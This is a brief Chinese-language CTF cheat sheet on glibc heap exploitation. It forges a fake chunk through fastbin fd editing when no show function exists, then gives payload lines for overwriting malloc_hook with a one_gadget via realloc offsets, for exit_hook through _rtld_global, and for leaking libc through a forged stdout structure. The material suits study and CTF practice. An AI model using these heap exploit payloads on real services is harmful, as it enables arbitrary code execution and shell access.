没有show函数,又限制malloc堆的大小怎么办?

先free两个fast

bin的chunk,然后修改其fd使其指向其中一个chunk的data段,然后在data段伪造一个chunk,再malloc两次即可修改size为unsorted_bin范围内即可。

1
2
3
4
5
6
7
8
9
10
11
12
13
add(0x28,0,b'aaaa') #0
add(0x28,1,b'aaaa') #1
add(0x50,2,b'aaaa') #2
add(0x60,3,b'aaaa') #3
add(0x60,4,b'aaaa') #4
delete(0)
delete(1)
edit(1,b'\x20')
edit(0,p64(0)*3+p64(0x31))
add(0x28,0,b'aaaa') #0
add(0x28,1,b'aaaa') #1
edit(1,p64(0) + p64(0x91))
delete(0)

hook利用偏移伪造size

  • realloc_hook 主要用来malloc_hoook调整栈帧,满足og条件,一般payload如下:
  • malloc_hook-0x23
1
2
offest = 0,2,4,6,0xb,0xc
payload = b'a'*11 + p64(og) + p64(libcbase + libc.sym['realloc'] + offest)
  • exit_hook 也是写og拿shell,不够eixt_hook叫 ‘_rtld_global’然后+偏移即可

stdout利用偏移伪造size

  • 用fastbin打stdout的时候也需要构造偏移:stdout-0x43
1
payload = b'a'*0x33 + p64(0xfbad1800) + p64(0)*3 + b'\x00'